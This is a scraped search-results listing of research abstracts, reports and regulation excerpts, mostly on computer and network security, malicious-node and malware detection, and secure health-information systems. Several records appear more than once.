The Internet holds both promise and peril for the communications of person-identifiable health information. Because of technical features designed to promote accessibility and interoperability rather than security, Internet addressing conventions and transport protocols are vulnerable to compromise by malicious persons and programs. In addition, most commonly used personal computer (PC) operating systems currently lack the hardware-based system software protection and process isolation that are essential for ensuring the integrity of trusted applications. Security approaches designed for electronic commerce, that trade known security weaknesses for limited financial liability, are not sufficient for personal health data, where the personal damage caused by unintentional disclosure may be far more serious. To overcome these obstacles, we are developing and evaluating an Internet-based communications system called PCASSO (Patient-centered access to secure systems online) that applies state of the art security to health information. PCASSO includes role-based access control, multi-level security, strong device and user authentication, session-specific encryption and audit trails. Unlike Internet-based electronic commerce 'solutions,' PCASSO secures data end-to-end: in the server; in the data repository; across the network; and on the client. PCASSO is designed to give patients as well as providers access to personal health records via the Internet.

Patterns in Patient Access and Utilization of Online Medical Records: Analysis of MyChart

PubMed Central

2018-01-01

Background Electronic patient portals provide a new method for sharing personal medical information with individual patients. Objective Our aim was to review utilization patterns of the largest online patient portal in Canada's largest city. Methods We conducted a 4-year time-trend analysis of aggregated anonymous utilization data of the MyChart patient portal at Sunnybrook Health Sciences Centre in Ontario, Canada, from January 1, 2012, through December 31, 2015. Prespecified analyses examined trends related to day (weekend vs weekday), season (July vs January), year (2012 vs 2015), and an extreme adverse weather event (ice storm of December 20-26, 2013). Primary endpoints included three measures of patient portal activity: registrations, logins, and pageviews. Results We identified 32,325 patients who registered for a MyChart account during the study interval. Time-trend analysis showed no sign of attenuating registrations over time. Logins were frequent, averaged 734 total per day, and showed an increasing trend over time. Pageviews mirrored logins, averaged about 3029 total per day, and equated to about 5 pageviews during the average login. The most popular pageviews were clinical notes, followed by laboratory results and medical imaging reports. All measures of patient activity were lower on weekends compared to weekdays (P<.001) yet showed no significant changes related to seasons or extreme weather. No major security breach, malware attack, or software failure occurred during the study. Conclusions Online patient portals can provide a popular and reliable system for distributing personal medical information to active patients and may merit consideration for hospitals. PMID:29410386

Characteristics of forest fuels, fire and emissions

Treesearch

Charles K. McMahon

1983-01-01

Introduction Forest fires can be divided into two broad classes--wildfires and prescribed fires. Wildfires, whether caused by nature (lightning, etc.) or by the accidental or malicious acts of man, are not planned by forest managers and do not occur under controlled conditions. They can be relatively tame, covering only a few hectares and burning...

Transformative Rendering of Internet Resources

DTIC Science & Technology

2012-10-01

4 Securing WiFi Connections...comes from legitimate web sites that have themselves been hacked . There is no way of anticipating which of these sites have been hacked and therefore...pose a security threat to visitors. The purpose of most of this web page hacking is to plant malicious code on the web site that will attack any

Caught on Camera: Special Education Classrooms and Video Surveillance

ERIC Educational Resources Information Center

Heintzelman, Sara C.; Bathon, Justin M.

2017-01-01

In Texas, state policy anticipates that installing video cameras in special education classrooms will decrease student abuse inflicted by teachers. Lawmakers assume that collecting video footage will prevent teachers from engaging in malicious actions and prosecute those who choose to harm children. At the request of a parent, Section 29.022 of…

MalWebID-Autodetection and Identification of Malicious Web Hosts Through Live Traffic Analysis

DTIC Science & Technology

2013-03-01

blogs, video services, and popular social media sites. In December 2000, there were near 361 million Internet users and by the end of December 2012...site (i.e., Porn , Rx/Pharmaceutical, illegal activity, etc.) – propagate or contain viruses, spyware, or other harmful programs, participate in spamming

Application of Cellular Automata to Detection of Malicious Network Packets

ERIC Educational Resources Information Center

Brown, Robert L.

2014-01-01

A problem in computer security is identification of attack signatures in network packets. An attack signature is a pattern of bits that characterizes a particular attack. Because there are many kinds of attacks, there are potentially many attack signatures. Furthermore, attackers may seek to avoid detection by altering the attack mechanism so that…

DOE Office of Scientific and Technical Information (OSTI.GOV)

Hamlet, Jason; Pierson, Lyndon; Bauer, Todd

Supply chain security to detect, deter, and prevent the counterfeiting of networked and stand-alone integrated circuits (ICs) is critical to cyber security. Sandia National Laboratory researchers have developed IC ID to leverage Physically Unclonable Functions (PUFs) and strong cryptographic authentication to create a unique fingerprint for each integrated circuit. IC ID assures the authenticity of ICs to prevent tampering or malicious substitution.

36 CFR 262.1 - Rewards in connection with fire or property prosecutions.

Code of Federal Regulations, 2011 CFR

2011-07-01

... fire or property prosecutions. 262.1 Section 262.1 Parks, Forests, and Public Property FOREST SERVICE... connection with fire or property prosecutions. (a) Hereafter, provided Congress shall make the necessary... of willfully or maliciously setting on fire, or causing to be set on fire, any timber, underbrush, or...

36 CFR 262.1 - Rewards in connection with fire or property prosecutions.

Code of Federal Regulations, 2012 CFR

2012-07-01

... fire or property prosecutions. 262.1 Section 262.1 Parks, Forests, and Public Property FOREST SERVICE... connection with fire or property prosecutions. (a) Hereafter, provided Congress shall make the necessary... of willfully or maliciously setting on fire, or causing to be set on fire, any timber, underbrush, or...

36 CFR 262.1 - Rewards in connection with fire or property prosecutions.

Code of Federal Regulations, 2014 CFR

2014-07-01

... fire or property prosecutions. 262.1 Section 262.1 Parks, Forests, and Public Property FOREST SERVICE... connection with fire or property prosecutions. (a) Hereafter, provided Congress shall make the necessary... of willfully or maliciously setting on fire, or causing to be set on fire, any timber, underbrush, or...

36 CFR 262.1 - Rewards in connection with fire or property prosecutions.

Code of Federal Regulations, 2013 CFR

2013-07-01

... fire or property prosecutions. 262.1 Section 262.1 Parks, Forests, and Public Property FOREST SERVICE... connection with fire or property prosecutions. (a) Hereafter, provided Congress shall make the necessary... of willfully or maliciously setting on fire, or causing to be set on fire, any timber, underbrush, or...

77 FR 52043 - Privacy Act of 1974; Proposed Exempt New System of Records

Federal Register 2010, 2011, 2012, 2013, 2014

2012-08-28

... study. 6. After NIH makes a finding of research misconduct and has informed ORI of the finding... Internet traffic to and from federal computer networks to prevent malicious computer code from reaching the... portable/ mobile devices including, but not limited to: Laptops, PDAs, USB drives, portable hard drives...

Students Compete to Mount Best Defense against Malicious Hackers

ERIC Educational Resources Information Center

Mejia, Robin

2008-01-01

The need for colleges to graduate students who understand computer security is growing. The Internet Crime Complaint Center, a partnership of the FBI; the National White Collar Crime Center; and the Bureau of Justice Assistance, in the Department of Justice, reported more than 90,000 crimes in 2007, with reported financial losses of almost…

Teaching Hackers: School Computing Culture and the Future of Cyber-Rights.

ERIC Educational Resources Information Center

Van Buren, Cassandra

2001-01-01

Discussion of the need for ethical computing strategies and policies at the K-12 level to acculturate computer hackers away from malicious network hacking focuses on a three-year participant observation ethnographic study conducted at the New Technology High School (California) that examined the school's attempts to socialize its hackers to act…

A malicious pattern detection engine for embedded security systems in the Internet of Things.

PubMed

Oh, Doohwan; Kim, Deokho; Ro, Won Woo

2014-12-16

With the emergence of the Internet of Things (IoT), a large number of physical objects in daily life have been aggressively connected to the Internet. As the number of objects connected to networks increases, the security systems face a critical challenge due to the global connectivity and accessibility of the IoT. However, it is difficult to adapt traditional security systems to the objects in the IoT, because of their limited computing power and memory size. In light of this, we present a lightweight security system that uses a novel malicious pattern-matching engine. We limit the memory usage of the proposed system in order to make it work on resource-constrained devices. To mitigate performance degradation due to limitations of computation power and memory, we propose two novel techniques, auxiliary shifting and early decision. Through both techniques, we can efficiently reduce the number of matching operations on resource-constrained systems. Experiments and performance analyses show that our proposed system achieves a maximum speedup of 2.14 with an IoT object and provides scalable performance for a large number of patterns.

TIUPAM: A Framework for Trustworthiness-Centric Information Sharing

NASA Astrophysics Data System (ADS)

Xu, Shouhuai; Sandhu, Ravi; Bertino, Elisa

Information is essential to decision making. Nowadays, decision makers are often overwhelmed with large volumes of information, some of which may be inaccurate, incorrect, inappropriate, misleading, or maliciously introduced. With the advocated shift of information sharing paradigm from “need to know” to “need to share” this problem will be further compounded. This poses the challenge of achieving assured information sharing so that decision makers can always get and utilize the up-to-date information for making the right decisions, despite the existence of malicious attacks and without breaching privacy of honest participants. As a first step towards answering this challenge this paper proposes a systematic framework we call TIUPAM, which stands for “Trustworthiness-centric Identity, Usage, Provenance, and Attack Management.” The framework is centered at the need of trustworthiness and risk management for decision makers, and supported by four key components: identity management, usage management, provenance management and attack management. We explore the characterization of both the core functions and the supporting components in the TIUPAM framework, which may guide the design and realization of concrete schemes in the future.

A Secure Trust Establishment Scheme for Wireless Sensor Networks

PubMed Central

Ishmanov, Farruh; Kim, Sung Won; Nam, Seung Yeob

2014-01-01

Trust establishment is an important tool to improve cooperation and enhance security in wireless sensor networks. The core of trust establishment is trust estimation. If a trust estimation method is not robust against attack and misbehavior, the trust values produced will be meaningless, and system performance will be degraded. We present a novel trust estimation method that is robust against on-off attacks and persistent malicious behavior. Moreover, in order to aggregate recommendations securely, we propose using a modified one-step M-estimator scheme. The novelty of the proposed scheme arises from combining past misbehavior with current status in a comprehensive way. Specifically, we introduce an aggregated misbehavior component in trust estimation, which assists in detecting an on-off attack and persistent malicious behavior. In order to determine the current status of the node, we employ previous trust values and current measured misbehavior components. These components are combined to obtain a robust trust value. Theoretical analyses and evaluation results show that our scheme performs better than other trust schemes in terms of detecting an on-off attack and persistent misbehavior. PMID:24451471

Privacy preservation and authentication on secure geographical routing in VANET

NASA Astrophysics Data System (ADS)

Punitha, A.; Manickam, J. Martin Leo

2017-05-01

Vehicular Ad hoc Networks (VANETs) play an important role in vehicle-to-vehicle communication as it offers a high level of safety and convenience to drivers. In order to increase the level of security and safety in VANETs, in this paper, we propose a Privacy Preservation and Authentication on Secure Geographical Routing Protocol (PPASGR) for VANET. It provides security by detecting and preventing malicious nodes through two directional antennas such as forward (f-antenna) and backward (b-antenna). The malicious nodes are detected by direction detection, consistency detection and conflict detection. The location of the trusted neighbour is identified using TNT-based location verification scheme after the implementation of the Vehicle Tamper Proof Device (VTPD), Trusted Authority (TA) is generated that produces the anonymous credentials. Finally, VTPD generates pseudo-identity using TA which retrieves the real identity of the sender. Through this approach, the authentication, integrity and confidentiality for routing packets can be achieved. The simulation results show that the proposed approach reduces the packet drop due to attack and improves the packet delivery ratio.

Detection, Localization, and Tracking of Unauthorized UAS and Jammers

NASA Technical Reports Server (NTRS)

Guvenc, Ismail; Ozdemir, Ozgur; Yapici, Yavuz; Mehrpouyan, Hani; Matolak, David

2017-01-01

Small unmanned aircraft systems (UASs) are expected to take major roles in future smart cities, for example, by delivering goods and merchandise, potentially serving as mobile hot spots for broadband wireless access, and maintaining surveillance and security. Although they can be used for the betterment of the society, they can also be used by malicious entities to conduct physical and cyber attacks to infrastructure, private/public property, and people. Even for legitimate use-cases of small UASs, air traffic management (ATM) for UASs becomes of critical importance for maintaining safe and collusion-free operation. Therefore, various ways to detect, track, and interdict potentially unauthorized drones carries critical importance for surveillance and ATM applications. In this paper, we will review techniques that rely on ambient radio frequency signals (emitted from UASs), radars, acoustic sensors, and computer vision techniques for detection of malicious UASs. We will present some early experimental and simulation results on radar-based range estimation of UASs, and receding horizon tracking of UASs. Subsequently, we will overview common techniques that are considered for interdiction of UASs.

Microorganisms: Good or Evil, MIRRI Provides Biosecurity Awareness.

PubMed

Smith, David; Martin, Dunja; Novossiolova, Tatyana

2017-03-01

The life-science community is a key stakeholder in the effort to ensure that the advances in biotechnology are not misused. Unfortunately, to date, the engagement of life scientists with issues of biosecurity has been limited. Microorganisms have been harnessed for the benefit of humankind but in the wrong hands could be used in direct or indirect acts against humans, livestock, crops, food, water infrastructure and other economically valuable entities. The Microbial Resources Research Infrastructure in its preparatory phase has addressed the topic implementing a code of conduct as part of its programme of prevention of malicious use and continues to work with the international community to raise awareness of best practice to avoid misuse of microorganisms. Biosecurity has become a major concern for several countries creating numerous activities to put in place counter measures, risk assessment, legislation and emergency response. The goal is to implement measures to protect us against malicious use of microorganisms, their products, information and technology transfer. Through this paper, we wish to discuss some of the activities that are underway, mention key educational tools and provide scientists with information on addressing biosecurity issues.

The Threat Among Us: Insiders Intensify Aviation Terrorism

DOE Office of Scientific and Technical Information (OSTI.GOV)

Krull, Katie E.

Aviation terrorism is powerful and symbolic, and will likely remain a staple target for terrorists aiming to inflict chaos and cause mass casualties similar to the 9/11 attacks on the U.S. The majority of international and domestic aviation terrorist attacks involves outsiders, or people who do not have direct access to or affiliation with a target through employment. However, several significant attacks and plots against the industry involved malicious employees motivated by suicide or devotion to a terrorist organization. Malicious insiders’ access and knowledge of aviation security, systems, networks, and infrastructure is valuable to terrorists, providing a different pathway formore » attacking the industry through the insider threat. Indicators and warnings of insider threats in these cases exist, providing insight into how security agencies, such as the Transportation Security Administration, can better predict and identify insider involvement. Understanding previous aviation insider threat events will likely aid in stimulating proactive security measures, rather than reactive responses. However, similar to traditional airport security measures, there are social, political, and economic challenges in protecting against the insider threat, including privacy concerns and cost-benefit analysis.« less

Security Assessment of Cyberphysical Digital Microfluidic Biochips.

PubMed

Ali, Sk Subidh; Ibrahim, Mohamed; Sinanoglu, Ozgur; Chakrabarty, Krishnendu; Karri, Ramesh

2016-01-01

A digital microfluidic biochip (DMFB) is an emerging technology that enables miniaturized analysis systems for point-of-care clinical diagnostics, DNA sequencing, and environmental monitoring. A DMFB reduces the rate of sample and reagent consumption, and automates the analysis of assays. In this paper, we provide the first assessment of the security vulnerabilities of DMFBs. We identify result-manipulation attacks on a DMFB that maliciously alter the assay outcomes. Two practical result-manipulation attacks are shown on a DMFB platform performing enzymatic glucose assay on serum. In the first attack, the attacker adjusts the concentration of the glucose sample and thereby modifies the final result. In the second attack, the attacker tampers with the calibration curve of the assay operation. We then identify denial-of-service attacks, where the attacker can disrupt the assay operation by tampering either with the droplet-routing algorithm or with the actuation sequence. We demonstrate these attacks using a digital microfluidic synthesis simulator. The results show that the attacks are easy to implement and hard to detect. Therefore, this work highlights the need for effective protections against malicious modifications in DMFBs.

Combating QR-Code-Based Compromised Accounts in Mobile Social Networks.

PubMed

Guo, Dong; Cao, Jian; Wang, Xiaoqi; Fu, Qiang; Li, Qiang

2016-09-20

Cyber Physical Social Sensing makes mobile social networks (MSNs) popular with users. However, such attacks are rampant as malicious URLs are spread covertly through quick response (QR) codes to control compromised accounts in MSNs to propagate malicious messages. Currently, there are generally two types of methods to identify compromised accounts in MSNs: one type is to analyze the potential threats on wireless access points and the potential threats on handheld devices' operation systems so as to stop compromised accounts from spreading malicious messages; the other type is to apply the method of detecting compromised accounts in online social networks to MSNs. The above types of methods above focus neither on the problems of MSNs themselves nor on the interaction of sensors' messages, which leads to the restrictiveness of platforms and the simplification of methods. In order to stop the spreading of compromised accounts in MSNs effectively, the attacks have to be traced to their sources first. Through sensors, users exchange information in MSNs and acquire information by scanning QR codes. Therefore, analyzing the traces of sensor-related information helps to identify the compromised accounts in MSNs. This paper analyzes the diversity of information sending modes of compromised accounts and normal accounts, analyzes the regularity of GPS (Global Positioning System)-based location information, and introduces the concepts of entropy and conditional entropy so as to construct an entropy-based model based on machine learning strategies. To achieve the goal, about 500,000 accounts of Sina Weibo and about 100 million corresponding messages are collected. Through the validation, the accuracy rate of the model is proved to be as high as 87.6%, and the false positive rate is only 3.7%. Meanwhile, the comparative experiments of the feature sets prove that sensor-based location information can be applied to detect the compromised accounts in MSNs.

Combating QR-Code-Based Compromised Accounts in Mobile Social Networks

PubMed Central

Guo, Dong; Cao, Jian; Wang, Xiaoqi; Fu, Qiang; Li, Qiang

2016-01-01

Cyber Physical Social Sensing makes mobile social networks (MSNs) popular with users. However, such attacks are rampant as malicious URLs are spread covertly through quick response (QR) codes to control compromised accounts in MSNs to propagate malicious messages. Currently, there are generally two types of methods to identify compromised accounts in MSNs: one type is to analyze the potential threats on wireless access points and the potential threats on handheld devices’ operation systems so as to stop compromised accounts from spreading malicious messages; the other type is to apply the method of detecting compromised accounts in online social networks to MSNs. The above types of methods above focus neither on the problems of MSNs themselves nor on the interaction of sensors’ messages, which leads to the restrictiveness of platforms and the simplification of methods. In order to stop the spreading of compromised accounts in MSNs effectively, the attacks have to be traced to their sources first. Through sensors, users exchange information in MSNs and acquire information by scanning QR codes. Therefore, analyzing the traces of sensor-related information helps to identify the compromised accounts in MSNs. This paper analyzes the diversity of information sending modes of compromised accounts and normal accounts, analyzes the regularity of GPS (Global Positioning System)-based location information, and introduces the concepts of entropy and conditional entropy so as to construct an entropy-based model based on machine learning strategies. To achieve the goal, about 500,000 accounts of Sina Weibo and about 100 million corresponding messages are collected. Through the validation, the accuracy rate of the model is proved to be as high as 87.6%, and the false positive rate is only 3.7%. Meanwhile, the comparative experiments of the feature sets prove that sensor-based location information can be applied to detect the compromised accounts in MSNs. PMID:27657071

Performance comparison of the Prophecy (forecasting) Algorithm in FFT form for unseen feature and time-series prediction

NASA Astrophysics Data System (ADS)

Jaenisch, Holger; Handley, James

2013-06-01

We introduce a generalized numerical prediction and forecasting algorithm. We have previously published it for malware byte sequence feature prediction and generalized distribution modeling for disparate test article analysis. We show how non-trivial non-periodic extrapolation of a numerical sequence (forecast and backcast) from the starting data is possible. Our ancestor-progeny prediction can yield new options for evolutionary programming. Our equations enable analytical integrals and derivatives to any order. Interpolation is controllable from smooth continuous to fractal structure estimation. We show how our generalized trigonometric polynomial can be derived using a Fourier transform.

Privacy and Integrity in the Untrusted Cloud

DTIC Science & Technology

2012-06-01

TYPE 3. DATES COVERED 00-00-2012 to 00-00-2012 4 . TITLE AND SUBTITLE Privacy and Integrity in the Untrusted Cloud 5a. CONTRACT NUMBER 5b...54 4 Frientegrity 55 4.1 Introduction...but still showing them to the user [105]. This behavior is 4 an example of provider equivocation [74, 67], in which a malicious service presents

The Bystander's Dilemma: How Can We Turn Our Students into Upstanders?

ERIC Educational Resources Information Center

Woglom, Lauren; Pennington, Kim

2010-01-01

While bullying is often accepted as an integral aspect of "growing up," it can have detrimental and lasting effects on its victims. Bullying can occur in a variety of forms, including direct teasing and threatening, the use of physical violence, and in the spreading of malicious gossip and rumors. With the proliferation of new technology, bullying…

Shaping the Bamboo from the Shoot: Elementary Level Character Education in Malaysia

ERIC Educational Resources Information Center

Thambusamy, Roslind; Elier, Adzura Ahmad

2013-01-01

This article emphasizes the importance of introducing/providing character education during the early years of child development in order to raise morally responsive citizens. Noting the rampant acts of violence and malicious crime at a time marked with deep global turmoil in many societies, the authors argue for an exhaustive study of the recently…

Physics Does Thrive under the Strangest of Circumstances

ERIC Educational Resources Information Center

Khoon, Koh Aik; Abd-Shukor, R.; Jalal, Azman; Talib, Ibrahim Abu; Daud, Abdul Razak; Samat, Supian; Yatim, Baharudin; Radiman, Shahidan

2008-01-01

Albert Einstein had famously said that Nature is subtle but not malicious. He should know better because he had unravelled some of the secrets of Nature at a relatively young age as an obscure patent clerk working in isolation. This paper tells of stories of other scientists who had also made ground-breaking discoveries in forced or self-imposed…

Malicious Use of Technology: What Schools, Parents, and Teachers Can Do to Prevent Cyberbullying

ERIC Educational Resources Information Center

Morgan, Hani

2013-01-01

In today's hyper-connected world, children's exposure to technology as a tool to communicate, learn, and socialize has increased exponentially. As teachers and parents recognize the demands for increased use of technology among young children, they should be able to identify and address the challenges associated with such exposure. Cyberbullying,…

Cyber Exercise Playbook

DTIC Science & Technology

2014-11-01

unclassified tools and techniques that can be shared with PNs, to include social engineering, spear phishing , fake web sites, physical access attempts, and...and instead rely on commercial services such as Yahoo or Google . Some nations have quite advanced cyber security practices, but may take vastly...unauthorized access to data/systems Inject external network scanning, email phishing , malicious website access, social engineering Sample

Using Hybrid Algorithm to Improve Intrusion Detection in Multi Layer Feed Forward Neural Networks

ERIC Educational Resources Information Center

Ray, Loye Lynn

2014-01-01

The need for detecting malicious behavior on a computer networks continued to be important to maintaining a safe and secure environment. The purpose of this study was to determine the relationship of multilayer feed forward neural network architecture to the ability of detecting abnormal behavior in networks. This involved building, training, and…

21 CFR 800.12 - Contact lens solutions and tablets; tamper-resistant packaging.

Code of Federal Regulations, 2010 CFR

2010-04-01

...-resistant retail packages, there is the opportunity for the malicious adulteration of these products with... confidence in the security of the packages of over-the-counter (OTC) health care products. The Food and Drug... used to make such a solution for retail sale that is not packaged in a tamper-resistant package and...

21 CFR 800.12 - Contact lens solutions and tablets; tamper-resistant packaging.

Code of Federal Regulations, 2011 CFR

2011-04-01

...-resistant retail packages, there is the opportunity for the malicious adulteration of these products with... confidence in the security of the packages of over-the-counter (OTC) health care products. The Food and Drug... used to make such a solution for retail sale that is not packaged in a tamper-resistant package and...

21 CFR 800.12 - Contact lens solutions and tablets; tamper-resistant packaging.

Code of Federal Regulations, 2012 CFR

2012-04-01

...-resistant retail packages, there is the opportunity for the malicious adulteration of these products with... confidence in the security of the packages of over-the-counter (OTC) health care products. The Food and Drug... used to make such a solution for retail sale that is not packaged in a tamper-resistant package and...

21 CFR 800.12 - Contact lens solutions and tablets; tamper-resistant packaging.

Code of Federal Regulations, 2013 CFR

2013-04-01

...-resistant retail packages, there is the opportunity for the malicious adulteration of these products with... confidence in the security of the packages of over-the-counter (OTC) health care products. The Food and Drug... used to make such a solution for retail sale that is not packaged in a tamper-resistant package and...

21 CFR 800.12 - Contact lens solutions and tablets; tamper-resistant packaging.

Code of Federal Regulations, 2014 CFR

2014-04-01

...-resistant retail packages, there is the opportunity for the malicious adulteration of these products with... confidence in the security of the packages of over-the-counter (OTC) health care products. The Food and Drug... used to make such a solution for retail sale that is not packaged in a tamper-resistant package and...

Polymorphic Attacks and Network Topology: Application of Concepts from Natural Systems

ERIC Educational Resources Information Center

Rangan, Prahalad

2010-01-01

The growing complexity of interactions between computers and networks makes the subject of network security a very interesting one. As our dependence on the services provided by computing networks grows, so does our investment in such technology. In this situation, there is a greater risk of occurrence of targeted malicious attacks on computers…

Building Trust-Based Sustainable Networks

DTIC Science & Technology

2013-06-05

entities to build sustainable networks with limited resources or misbehaving entities by learning from the lessons in the social sciences. We discuss...their individuality); and ■ Misbehaving nodes in terms of environmental, economic, and social perspectives. The sustainable network concerns...equitable access to particular services which are otherwise abused by misbehaving or malicious users. Such approaches provide a fair and

The Insider Threat Security Architecture: An Integrated, Inseparable, and Uninterrupted Self-Protection Autonomic Framework

ERIC Educational Resources Information Center

Jabbour, Ghassan

2010-01-01

The increasing proliferation of globally interconnected complex information systems has elevated the magnitude of attacks and the level of damage that they inflict on such systems. This open environment of intertwined financial, medical, defense, and other systems has attracted hackers to increase their malicious activities to cause harm or to…

Patterns in Patient Access and Utilization of Online Medical Records: Analysis of MyChart.

PubMed

Redelmeier, Donald A; Kraus, Nicole C

2018-02-06

Electronic patient portals provide a new method for sharing personal medical information with individual patients. Our aim was to review utilization patterns of the largest online patient portal in Canada's largest city. We conducted a 4-year time-trend analysis of aggregated anonymous utilization data of the MyChart patient portal at Sunnybrook Health Sciences Centre in Ontario, Canada, from January 1, 2012, through December 31, 2015. Prespecified analyses examined trends related to day (weekend vs weekday), season (July vs January), year (2012 vs 2015), and an extreme adverse weather event (ice storm of December 20-26, 2013). Primary endpoints included three measures of patient portal activity: registrations, logins, and pageviews. We identified 32,325 patients who registered for a MyChart account during the study interval. Time-trend analysis showed no sign of attenuating registrations over time. Logins were frequent, averaged 734 total per day, and showed an increasing trend over time. Pageviews mirrored logins, averaged about 3029 total per day, and equated to about 5 pageviews during the average login. The most popular pageviews were clinical notes, followed by laboratory results and medical imaging reports. All measures of patient activity were lower on weekends compared to weekdays (P<.001) yet showed no significant changes related to seasons or extreme weather. No major security breach, malware attack, or software failure occurred during the study. Online patient portals can provide a popular and reliable system for distributing personal medical information to active patients and may merit consideration for hospitals. ©Donald A Redelmeier, Nicole C Kraus. Originally published in the Journal of Medical Internet Research (http://www.jmir.org), 06.02.2018.

Minimizing liability during internal investigations.

PubMed

Morris, Cole

2010-01-01

Today's security professional must appreciate the potential landmines in any investigative effort and work collaboratively with others to minimize liability risks, the author points out. In this article he examines six civil torts that commonly arise from unprofessionally planned or poorly executed internal investigations-defamation, false imprisonment. intentional infliction of emotional distress, assault and battery, invasion of privacy, and malicious prosecution and abuse of process.

R&D100: IC ID

ScienceCinema

Hamlet, Jason; Pierson, Lyndon; Bauer, Todd

2018-06-25

Supply chain security to detect, deter, and prevent the counterfeiting of networked and stand-alone integrated circuits (ICs) is critical to cyber security. Sandia National Laboratory researchers have developed IC ID to leverage Physically Unclonable Functions (PUFs) and strong cryptographic authentication to create a unique fingerprint for each integrated circuit. IC ID assures the authenticity of ICs to prevent tampering or malicious substitution.

DSB Task Force on Cyber Supply Chain

DTIC Science & Technology

2017-04-01

seeking to exploit a maliciously inserted vulnerability must execute each step in the kill chain:  Intelligence and planning: gathering...are intended to take a comprehensive approach in considering all aspects of system security, including cybersecurity , and address initial steps to...specific integrated circuits (ASICs). That need is likely to grow for systems that support intelligent or autonomous capabilities. The current

Thermal remote sensing of active vegetation fires and biomass burning events [Chapter 18

Treesearch

Martin J. Wooster; Gareth Roberts; Alistair M.S. Smith; Joshua Johnston; Patrick Freeborn; Stefania Amici; Andrew T. Hudak

2013-01-01

Thermal remote sensing is widely used in the detection, study, and management of biomass burning occurring in open vegetation fires. Such fires may be planned for land management purposes, may occur as a result of a malicious or accidental ignition by humans, or may result from lightning or other natural phenomena. Under suitable conditions, fires may spread rapidly...

Automated Program Analysis for Cybersecurity (APAC)

DTIC Science & Technology

2016-07-14

AUTOMATED PROGRAM ANALYSIS FOR CYBERSECURITY (APAC) FIVE DIRECTIONS, INC JULY 2016 FINAL TECHNICAL REPORT APPROVED... CYBERSECURITY (APAC) 5a. CONTRACT NUMBER FA8750-14-C-0050 5b. GRANT NUMBER N/A 5c. PROGRAM ELEMENT NUMBER 61101E 6. AUTHOR(S) William Arbaugh...AC Team Adversarial Challenge Team, responsible for creating malicious applications APAC Automated Program Analysis for Cybersecurity BAE BAE Systems

Phishing E-Mails--Six Month Investigation into What People Click

ERIC Educational Resources Information Center

Lehrfeld, Michael R.

2014-01-01

Phishing and SPAM emails have been used by marketers and hackers alike since the inception of email and the Internet. Phishing messages have become so common that many legitimate emails often get flagged and placed in a user's spam bucket. No one is denying that these messages are at a minimum a nuisance, and in many cases malicious. But what is…

Secure and Fair Cluster Head Selection Protocol for Enhancing Security in Mobile Ad Hoc Networks

PubMed Central

Paramasivan, B.; Kaliappan, M.

2014-01-01

Mobile ad hoc networks (MANETs) are wireless networks consisting of number of autonomous mobile devices temporarily interconnected into a network by wireless media. MANETs become one of the most prevalent areas of research in the recent years. Resource limitations, energy efficiency, scalability, and security are the great challenging issues in MANETs. Due to its deployment nature, MANETs are more vulnerable to malicious attack. The secure routing protocols perform very basic security related functions which are not sufficient to protect the network. In this paper, a secure and fair cluster head selection protocol (SFCP) is proposed which integrates security factors into the clustering approach for achieving attacker identification and classification. Byzantine agreement based cooperative technique is used for attacker identification and classification to make the network more attack resistant. SFCP used to solve this issue by making the nodes that are totally surrounded by malicious neighbors adjust dynamically their belief and disbelief thresholds. The proposed protocol selects the secure and energy efficient cluster head which acts as a local detector without imposing overhead to the clustering performance. SFCP is simulated in network simulator 2 and compared with two protocols including AODV and CBRP. PMID:25143986

Impact of Information based Classification on Network Epidemics

PubMed Central

Mishra, Bimal Kumar; Haldar, Kaushik; Sinha, Durgesh Nandini

2016-01-01

Formulating mathematical models for accurate approximation of malicious propagation in a network is a difficult process because of our inherent lack of understanding of several underlying physical processes that intrinsically characterize the broader picture. The aim of this paper is to understand the impact of available information in the control of malicious network epidemics. A 1-n-n-1 type differential epidemic model is proposed, where the differentiality allows a symptom based classification. This is the first such attempt to add such a classification into the existing epidemic framework. The model is incorporated into a five class system called the DifEpGoss architecture. Analysis reveals an epidemic threshold, based on which the long-term behavior of the system is analyzed. In this work three real network datasets with 22002, 22469 and 22607 undirected edges respectively, are used. The datasets show that classification based prevention given in the model can have a good role in containing network epidemics. Further simulation based experiments are used with a three category classification of attack and defense strengths, which allows us to consider 27 different possibilities. These experiments further corroborate the utility of the proposed model. The paper concludes with several interesting results. PMID:27329348

Time Pattern Locking Scheme for Secure Multimedia Contents in Human-Centric Device

PubMed Central

Kim, Hyun-Woo; Kim, Jun-Ho; Park, Jong Hyuk; Jeong, Young-Sik

2014-01-01

Among the various smart multimedia devices, multimedia smartphones have become the most widespread due to their convenient portability and real-time information sharing, as well as various other built-in features. Accordingly, since personal and business activities can be carried out using multimedia smartphones without restrictions based on time and location, people have more leisure time and convenience than ever. However, problems such as loss, theft, and information leakage because of convenient portability have also increased proportionally. As a result, most multimedia smartphones are equipped with various built-in locking features. Pattern lock, personal identification numbers, and passwords are the most used locking features on current smartphones, but these are vulnerable to shoulder surfing and smudge attacks, allowing malicious users to bypass the security feature easily. In particular, the smudge attack technique is a convenient way to unlock multimedia smartphones after they have been stolen. In this paper, we propose the secure locking screen using time pattern (SLSTP) focusing on improved security and convenience for users to support human-centric multimedia device completely. The SLSTP can provide a simple interface to users and reduce the risk factors pertaining to security leakage to malicious third parties. PMID:25202737

Secure and fair cluster head selection protocol for enhancing security in mobile ad hoc networks.

PubMed

Paramasivan, B; Kaliappan, M

2014-01-01

Mobile ad hoc networks (MANETs) are wireless networks consisting of number of autonomous mobile devices temporarily interconnected into a network by wireless media. MANETs become one of the most prevalent areas of research in the recent years. Resource limitations, energy efficiency, scalability, and security are the great challenging issues in MANETs. Due to its deployment nature, MANETs are more vulnerable to malicious attack. The secure routing protocols perform very basic security related functions which are not sufficient to protect the network. In this paper, a secure and fair cluster head selection protocol (SFCP) is proposed which integrates security factors into the clustering approach for achieving attacker identification and classification. Byzantine agreement based cooperative technique is used for attacker identification and classification to make the network more attack resistant. SFCP used to solve this issue by making the nodes that are totally surrounded by malicious neighbors adjust dynamically their belief and disbelief thresholds. The proposed protocol selects the secure and energy efficient cluster head which acts as a local detector without imposing overhead to the clustering performance. SFCP is simulated in network simulator 2 and compared with two protocols including AODV and CBRP.

Time pattern locking scheme for secure multimedia contents in human-centric device.

PubMed

Kim, Hyun-Woo; Kim, Jun-Ho; Park, Jong Hyuk; Jeong, Young-Sik

2014-01-01

